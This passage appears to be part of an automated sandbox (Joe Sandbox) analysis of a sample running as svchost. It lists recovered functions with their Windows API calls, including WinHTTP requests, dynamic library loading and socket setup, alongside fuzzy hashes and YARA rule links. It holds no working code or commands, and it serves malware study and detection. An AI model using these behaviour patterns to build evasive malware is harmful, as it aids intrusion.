Opcode Fuzzy Hash: b6861136f8e326d3c042ad7c7da078c728545a6e6e7d1915c2030f11a707d94e
Instruction Fuzzy Hash: 429148B6601A918AEB22DF32E4907EE37B1F749BDDF145115EF4A17A68CB36C885C700

Function 0000000140007740 Relevance: 21.1, APIs: 14, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 0000000140007762
HeapFree.KERNEL32 ref: 000000014000777D
HeapFree.KERNEL32 ref: 0000000140007798
HeapFree.KERNEL32 ref: 00000001400077B3
HeapFree.KERNEL32 ref: 00000001400077CE
HeapFree.KERNEL32 ref: 00000001400077E9
HeapFree.KERNEL32 ref: 0000000140007810
HeapFree.KERNEL32 ref: 000000014000782E
HeapFree.KERNEL32 ref: 000000014000784C
??3@YAXPEAX@Z.MSVCRT ref: 000000014000787A
WinHttpCloseHandle.WINHTTP ref: 000000014000D522
WinHttpCloseHandle.WINHTTP ref: 000000014000D531
WinHttpCloseHandle.WINHTTP ref: 000000014000D540
HeapFree.KERNEL32 ref: 000000014000D55B

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleHttp$??3@
String ID:
API String ID: 3500024125-0
Opcode ID: 119ff7e25ad4148979bb3aff6135a8682ecc72c0b94b38b8e4308b1bc6026636
Instruction ID: 7c82ee3f3e0be60d7d2ee0712700461a8a45a917594ce0937cf0833207fb0a1d
Opcode Fuzzy Hash: 119ff7e25ad4148979bb3aff6135a8682ecc72c0b94b38b8e4308b1bc6026636
Instruction Fuzzy Hash: F251E4B5600B8581EA86DB57E8543EA23A0FB8DFD5F04401AEF8D57776CE39C885C380

Function 00000001400108C0 Relevance: 16.8, APIs: 11, Instructions: 308memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140011190: SysFreeString.OLEAUT32 ref: 00000001400111B8
Part of subcall function 0000000140011190: SysFreeString.OLEAUT32 ref: 00000001400111C7
Part of subcall function 0000000140011190: HeapFree.KERNEL32(?,?,?,000000014000EFEF,?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 00000001400111F7

SysFreeString.OLEAUT32 ref: 00000001400109DA
SysFreeString.OLEAUT32 ref: 00000001400109ED
SysFreeString.OLEAUT32 ref: 0000000140010D20
SysFreeString.OLEAUT32 ref: 0000000140010D2E
SysFreeString.OLEAUT32 ref: 0000000140010D63
SysFreeString.OLEAUT32 ref: 0000000140010D6D
HeapFree.KERNEL32 ref: 0000000140010D90

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap
String ID:
API String ID: 4134718113-0
Opcode ID: 7302ecce643bb001c8937cf8e71a960d646b8d06111705271868ac4a7d8ec183
Instruction ID: 5bbe0f4e1f777998957cbe3a4eb7b9395ba18578963b24f341d411ea742c8042
Opcode Fuzzy Hash: 7302ecce643bb001c8937cf8e71a960d646b8d06111705271868ac4a7d8ec183
Instruction Fuzzy Hash: 22D15E36214A9586EB52DF26E8503EE67A0FB8DBC8F144015FF8A4BB68DF7AC545C700

Function 000000014000D7F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 118timeCOMMON

Download Yara Rule

APIs

WinHttpCloseHandle.WINHTTP ref: 000000014000D837
WinHttpSetTimeouts.WINHTTP ref: 000000014000D85B
WinHttpOpenRequest.WINHTTP ref: 000000014000D8D4
WinHttpSetOption.WINHTTP ref: 000000014000D907
WinHttpSendRequest.WINHTTP ref: 000000014000D93D
WinHttpReceiveResponse.WINHTTP ref: 000000014000D94D
WinHttpQueryHeaders.WINHTTP ref: 000000014000D97A
WinHttpCloseHandle.WINHTTP ref: 000000014000D9A5

Strings

2), xrefs: 000000014000D84A

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Http$CloseHandleRequest$HeadersOpenOptionQueryReceiveResponseSendTimeouts
String ID: 2)
API String ID: 1140403012-1274239105
Opcode ID: ca76223a764c42e3e576a9eaca017e5749e6c79a234e6967d36dbbb6f7a1b5cb
Instruction ID: c866e5fc1bbb2455b780a7f5f5a0285e187b55cd79e2f29ec521d05873807281
Opcode Fuzzy Hash: ca76223a764c42e3e576a9eaca017e5749e6c79a234e6967d36dbbb6f7a1b5cb
Instruction Fuzzy Hash: 90516C72204B8186EB65CF26F850BAA73A0F78CB84F145116EF8987B68DB39C555CB90

Function 0000000140005460 Relevance: 15.2, APIs: 10, Instructions: 234memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00000001400054BE
SysFreeString.OLEAUT32 ref: 00000001400054CD
??3@YAXPEAX@Z.MSVCRT ref: 00000001400054D6
??2@YAPEAX_K@Z.MSVCRT ref: 00000001400054F6
SysAllocString.OLEAUT32 ref: 000000014000550E
SysAllocString.OLEAUT32 ref: 000000014000551B
HeapFree.KERNEL32 ref: 00000001400057A9
SysFreeString.OLEAUT32 ref: 00000001400057C5
SysFreeString.OLEAUT32 ref: 00000001400057D4
??3@YAXPEAX@Z.MSVCRT ref: 00000001400057DD

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: String$Free$??3@Alloc$??2@Heap
String ID:
API String ID: 3556069409-0
Opcode ID: ec27783b2e876d2f249bbed04aa86fcb934e499a021eea16907d0ee533d21b6c
Instruction ID: c0ef10fccdeb6daa0a0422ac56e41beaac227df42e421e6682d1b4ce94b3c9bf
Opcode Fuzzy Hash: ec27783b2e876d2f249bbed04aa86fcb934e499a021eea16907d0ee533d21b6c
Instruction Fuzzy Hash: CAA17E75305A8086EA62EF12B8143EB23A5FB8DBCAF144515AF4E0B7A8EF39C541C750

Function 0000000140010DC0 Relevance: 13.7, APIs: 9, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140010E39

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

Part of subcall function 000000014000E0C0: memcpy.MSVCRT ref: 000000014000E285

SysFreeString.OLEAUT32 ref: 0000000140010E47
SysAllocString.OLEAUT32 ref: 0000000140010E59
SysAllocString.OLEAUT32 ref: 0000000140010E66
SysFreeString.OLEAUT32 ref: 0000000140011067
SysFreeString.OLEAUT32 ref: 0000000140011075
SysFreeString.OLEAUT32 ref: 00000001400110A6
SysFreeString.OLEAUT32 ref: 00000001400110B0
HeapFree.KERNEL32 ref: 00000001400110ED

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: String$Free$Alloc$Heapmemcpymemset
String ID:
API String ID: 611701654-0
Opcode ID: 43e2484f7a0373ffed07650949c510c01665978dde713542509007a1855861b5
Instruction ID: 1bf9e857b8df484256096c26ec551cdfd3ef17b886eb789306359d79b8ec2ccb
Opcode Fuzzy Hash: 43e2484f7a0373ffed07650949c510c01665978dde713542509007a1855861b5
Instruction Fuzzy Hash: C7914E32214AD186EB628F13E8503EA77A0FB8DBC8F449055FB8A4B765DF7AC546C740

Function 0000000140015CF0 Relevance: 13.7, APIs: 9, Instructions: 182memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400075C0: memset.MSVCRT ref: 000000014000761C
Part of subcall function 00000001400075C0: memset.MSVCRT ref: 0000000140007630
Part of subcall function 00000001400075C0: ??2@YAPEAX_K@Z.MSVCRT ref: 000000014000768D
Part of subcall function 00000001400075C0: _time64.MSVCRT ref: 00000001400076CF
Part of subcall function 00000001400075C0: HeapFree.KERNEL32 ref: 00000001400076F9
Part of subcall function 00000001400075C0: _time64.MSVCRT ref: 000000014000770F

HeapFree.KERNEL32 ref: 0000000140015D5C
HeapFree.KERNEL32 ref: 0000000140015DC9
HeapFree.KERNEL32 ref: 0000000140015EBF
HeapFree.KERNEL32 ref: 0000000140015EE6
HeapFree.KERNEL32 ref: 0000000140015F00
??3@YAXPEAX@Z.MSVCRT ref: 0000000140015F2A
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140015F69
SysFreeString.OLEAUT32 ref: 0000000140015FD0
SysAllocString.OLEAUT32 ref: 0000000140015FD9

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$??2@String_time64memset$??3@Alloc
String ID:
API String ID: 2204789691-0
Opcode ID: 95ac986d8669442a64dbbed0be9654765a4166706f81caccdcbd7723b73e3a14
Instruction ID: d9dbd6d1c3e7fa4b14e618689f3d3978398575ef73f47ae2eb561969472c8340
Opcode Fuzzy Hash: 95ac986d8669442a64dbbed0be9654765a4166706f81caccdcbd7723b73e3a14
Instruction Fuzzy Hash: 29812872205B8586EA62EF12E8503EA63A5F7CDBC5F040029EF8D4B7A5DF3AC955C740

Function 000000014000D9E0 Relevance: 13.6, APIs: 9, Instructions: 141librarymemoryloaderCOMMON

Download Yara Rule

APIs

WinHttpQueryDataAvailable.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA23
RtlReAllocateHeap.NTDLL ref: 000000014000DBA1

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA74

Part of subcall function 000000014000E0C0: memcpy.MSVCRT ref: 000000014000E285

GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA96
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DAD9
WinHttpReadData.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DBDF

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressDataHttpProc$AllocateAvailableHeapLibraryLoadQueryReadmemcpymemset
String ID:
API String ID: 2116122043-0
Opcode ID: eda387c1990850be9d72052e7b5767021a6b702d6547201d64221c1c24894c1a
Instruction ID: dcb2aa4c958721db2a120c4ea9a07c4cdbbbd9df540347d3848d8a894ea84299
Opcode Fuzzy Hash: eda387c1990850be9d72052e7b5767021a6b702d6547201d64221c1c24894c1a
Instruction Fuzzy Hash: 9D512672305B8486EA62CB17E8443DAB7A5B78CBC4F448126AF8D4B769EF7CC445C750

Function 0000000140005800 Relevance: 12.2, APIs: 8, Instructions: 160memorynetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 000000014000584E
HeapFree.KERNEL32 ref: 00000001400058B4
freeaddrinfo.WS2_32 ref: 00000001400058CF
freeaddrinfo.WS2_32 ref: 0000000140005A73
HeapFree.KERNEL32 ref: 0000000140005A8D
HeapFree.KERNEL32 ref: 0000000140005AAF
WSACleanup.WS2_32 ref: 0000000140005AB5

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Part of subcall function 0000000140005AD0: HeapFree.KERNEL32 ref: 0000000140005BD9
Part of subcall function 0000000140005AD0: HeapFree.KERNEL32 ref: 0000000140005BF3
Part of subcall function 0000000140005AD0: HeapFree.KERNEL32 ref: 0000000140005C0F

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$freeaddrinfo$AddressCleanupLibraryLoadProcStartup
String ID:
API String ID: 4167984890-0
Opcode ID: b6c1d0173120b872468714721331bb600554943aecce16ba3b87f6cb93eadc8f
Instruction ID: 1f05485aafd538e14a92043d9081f1b9a7aae193132c0cc0b42c540dcab88815
Opcode Fuzzy Hash: b6c1d0173120b872468714721331bb600554943aecce16ba3b87f6cb93eadc8f
Instruction Fuzzy Hash: DF716A76201BC185EB62DF62E8943EA23A1FB8EBC8F444115EB8E47B65DF38C545C740

Function 000000014000BD60 Relevance: 12.1, APIs: 8, Instructions: 92libraryloadermemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

GetModuleFileNameW.KERNEL32 ref: 000000014000BDAF
RtlReAllocateHeap.NTDLL ref: 000000014000BECA

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

LoadLibraryA.KERNEL32 ref: 000000014000BDF2

Part of subcall function 000000014000E0C0: memcpy.MSVCRT ref: 000000014000E285

GetProcAddress.KERNEL32 ref: 000000014000BE14
GetProcAddress.KERNEL32 ref: 000000014000BE43
GetProcAddress.KERNEL32 ref: 000000014000BE72
GetProcAddress.KERNEL32 ref: 000000014000BE9D
GetProcessHeap.KERNEL32 ref: 000000014000BEAF

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$HeapLibraryLoad$AllocateFileModuleNameProcessmemcpymemset
String ID:
API String ID: 2956276425-0
Opcode ID: ef3f1b3311ed1376dd4c04dcf21c248c285364accc3ced16850b60ca19486d22
Instruction ID: fe1601f0d561c1644e1890eb6a4d3931ee81d1573273c71cbb6c5fd60530c169
Opcode Fuzzy Hash: ef3f1b3311ed1376dd4c04dcf21c248c285364accc3ced16850b60ca19486d22
Instruction Fuzzy Hash: 00411471201B8585EA62DB12E8443D963A4FB8CBC4F584529EB8D07B79EF78C949C740

Function 0000000140010480 Relevance: 10.8, APIs: 7, Instructions: 259memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140011110: SysFreeString.OLEAUT32 ref: 0000000140011138
Part of subcall function 0000000140011110: SysFreeString.OLEAUT32 ref: 0000000140011147
Part of subcall function 0000000140011110: HeapFree.KERNEL32(?,?,?,000000014000EFE0,?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 0000000140011177

SysFreeString.OLEAUT32 ref: 000000014001059A
SysFreeString.OLEAUT32 ref: 0000000140010819
SysFreeString.OLEAUT32 ref: 0000000140010853
SysFreeString.OLEAUT32 ref: 000000014001085D
HeapFree.KERNEL32 ref: 0000000140010898

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap
String ID:
API String ID: 4134718113-0
Opcode ID: 5ce186634ba1048476c2aab6cefeef9c61c33636ed2beaa4357a2c441f44e577
Instruction ID: aed83f4b948c4985c135c6fbceb64c6b8094804d589bec6b40d7a8f706b6a698
Opcode Fuzzy Hash: 5ce186634ba1048476c2aab6cefeef9c61c33636ed2beaa4357a2c441f44e577
Instruction Fuzzy Hash: 5DC14F76614B9186EB62DF26D8503EE7760FB88BC8F144015EB8E4BBA8DF79C545C700

Function 0000000140009B86 Relevance: 10.1, APIs: 8, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 000000014000A0F3
HeapFree.KERNEL32(?,?,00000000), ref: 000000014000A110
HeapFree.KERNEL32(?,?,00000000), ref: 000000014000A12E
HeapFree.KERNEL32(?,?,00000000), ref: 000000014000A195
HeapFree.KERNEL32(?,?,00000000), ref: 000000014000A1B9
HeapFree.KERNEL32(?,?,00000000), ref: 000000014000A1D5

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: cdb081c7fe57a8e15ae6026e049c3cbad653b2c357f5b1a6b31e992980573e73
Instruction ID: ed98ba6ede692f367d8fff878989292d2ab0398e512eb47c8f97488a2b74d39a
Opcode Fuzzy Hash: cdb081c7fe57a8e15ae6026e049c3cbad653b2c357f5b1a6b31e992980573e73
Instruction Fuzzy Hash: 7051BCB2600BC481F752CF66E8007EA23A4FB8ABCCF058119EF8D17676DF3885858740

Function 000000014000FF40 Relevance: 9.3, APIs: 6, Instructions: 317COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000014000FFEC
SysFreeString.OLEAUT32 ref: 0000000140010005

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 9164363e3df22314f312239187880fad4b7a9d552fd5b7cf99c6ac724edd476b
Instruction ID: dd41a748227c6243df9798e51560345f6e40f6322dbc4b2b080599702ec169ce
Opcode Fuzzy Hash: 9164363e3df22314f312239187880fad4b7a9d552fd5b7cf99c6ac724edd476b
Instruction Fuzzy Hash: 66E13372211AD586EF62CF26D8503ED77A0FB88BC8F449056EB8E4B669DF76C605C310

Function 0000000140004E20 Relevance: 9.2, APIs: 6, Instructions: 244memoryCOMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 0000000140004E44
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140004E92
HeapFree.KERNEL32 ref: 0000000140004F86
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004FA1

Part of subcall function 0000000140002300: CoCreateInstance.COMBASE ref: 0000000140002351

??3@YAXPEAX@Z.MSVCRT ref: 0000000140005061
??3@YAXPEAX@Z.MSVCRT ref: 00000001400050AF

Part of subcall function 00000001400023B0: HeapFree.KERNEL32 ref: 0000000140002412

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ??3@$??2@FreeHeap$CreateInstance
String ID:
API String ID: 476970657-0
Opcode ID: 11c8ce8e7e0d1981926aa617da1213d9ca6a6b43375e24facf04d2d8059c808a
Instruction ID: 29537610e8d11700659b38353b7452f6f9fc0ea2a811a385638278bdb090ea32
Opcode Fuzzy Hash: 11c8ce8e7e0d1981926aa617da1213d9ca6a6b43375e24facf04d2d8059c808a
Instruction Fuzzy Hash: C1A15FB2205A8182EB62DF13B4507EFB3A4FB99BC5F045126EB8947BA5DF79C841C740

Function 0000000140017E00 Relevance: 9.1, APIs: 6, Instructions: 133sleepCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140017E22
Sleep.KERNEL32 ref: 0000000140017E58
_amsg_exit.MSVCRT ref: 0000000140017E6E
_initterm.MSVCRT ref: 0000000140017EF5
exit.MSVCRT ref: 0000000140017FBA
_cexit.MSVCRT ref: 0000000140017FC8

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: InfoSleepStartup_amsg_exit_cexit_inittermexit
String ID:
API String ID: 2456207614-0
Opcode ID: 5360f1c04b7edbaa5d775165d56065c574be986e94f26ab25caa58a34893f057
Instruction ID: dd7bef42800268433d42df4e9d168aee914250b00c3c1566757323a5b0bfa38a
Opcode Fuzzy Hash: 5360f1c04b7edbaa5d775165d56065c574be986e94f26ab25caa58a34893f057
Instruction Fuzzy Hash: 1951063160564086EB629F56E880BAA33F1F34C7C4F54442AFB8A8B6B5DB7AC985C741

Function 000000014000AFA0 Relevance: 9.1, APIs: 6, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

_wtoi.MSVCRT ref: 000000014000B036
_wtoi.MSVCRT ref: 000000014000B043
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000000140008559), ref: 000000014000B0FA
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000000140008559), ref: 000000014000B125
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000000140008559), ref: 000000014000B142

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$_wtoi
String ID:
API String ID: 500119451-0
Opcode ID: cf2e6b14873cbda237f9802f76c90b55902cd014c2792bbb12101c55a9548aad
Instruction ID: 369d08c27aeb9e497d69f017f6d0c736d1be854fe5c0f34ec9398f35f1db6328
Opcode Fuzzy Hash: cf2e6b14873cbda237f9802f76c90b55902cd014c2792bbb12101c55a9548aad
Instruction Fuzzy Hash: DD516D72605B8482EB62DF57B8403ABA7A4F78DBD4F448025EF89437A5DF38C9958700

Function 00000001400062E6 Relevance: 9.1, APIs: 6, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140006506
SysFreeString.OLEAUT32 ref: 0000000140006519
SysFreeString.OLEAUT32 ref: 0000000140006527
SysFreeString.OLEAUT32 ref: 0000000140006565
SysFreeString.OLEAUT32 ref: 000000014000656F
HeapFree.KERNEL32 ref: 00000001400065AA

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap
String ID:
API String ID: 4134718113-0
Opcode ID: ed4153d8dbd31d6f314157dcbdedce6db1cc8a59a21d44a72ca7804b43617e2e
